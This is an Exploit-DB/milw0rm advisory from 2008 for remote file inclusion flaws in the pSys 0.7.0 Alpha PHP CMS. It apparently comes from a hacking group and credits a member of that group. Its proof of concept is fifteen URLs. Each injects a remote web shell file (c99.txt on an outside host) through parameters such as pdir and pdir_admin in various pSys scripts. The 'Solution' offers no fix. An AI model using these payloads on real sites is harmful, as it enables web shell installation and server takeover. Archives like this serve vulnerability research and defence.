pSys 0.7.0 Alpha - Multiple Remote File Inclusions

EDB-ID:

6076

CVE:

N/A




Platform:

PHP

Date:

2008-07-15


   ====================================================
   | pSys v0.7.0 Alpha Multiple Remote File Include   
   |     (works only with register_globals = on)      
   |        Founded By rXh RoMaNTiC-TeaM              
   ====================================================

[!] Discovered.:                           RoMaNcYxHaCkEr
[!] Vendor.....:                            http://www.powie.de
[!] My Homepage...:                    WwW.4RxH.CoM
[!] RoMaNTiC-TeaM Members ...:  Unknown Hacker , aLwHeD , GaMe-OvEr-HaCkErs
[!] Contact Me ...:                        rxh0@hotmail.com

[!] Background.:                          pSys is a module based PHP Script

[!] Bugs........:                             In Different Files & In Different Variable And Lines

[!] PoC........: 

http://4RxH.CoM/cms1/login.inc.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/admin/adminmenuright.php?pdir_admin=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/admin/fuss.php?pdir_admin=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/admin/kopf.php?pdir_admin=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/forum/ajax_newpost.inc.php?pdir_lib=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/panels/panel_shopkategorie.php?pdir_mod=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/panels/panel_shopkunde.php?pdir_mod=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/panels/panel_user.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/mod/gb/ajax_post.inc.php?pdir_lib=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/style/csg/fuss.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/style/csg/kopf.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/style/default/fuss.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/style/default/kopf.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/style/simpleblack/fuss.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/style/simpleblack/kopf.php?pdir=http://www.uploadhere.org/c99.txt?

[!] Solution...:     Contact With Me I Will Declear All This Fucking Function

[!] Greetingz..:    No One Deserved (Am I Said The Truth ?!!!)

[!] Thx .. :           DNX For Your Exploit I Found This Bugs From Your Exploit  :) 

[!] rXh

[!] bEST wISHES

# milw0rm.com [2008-07-15]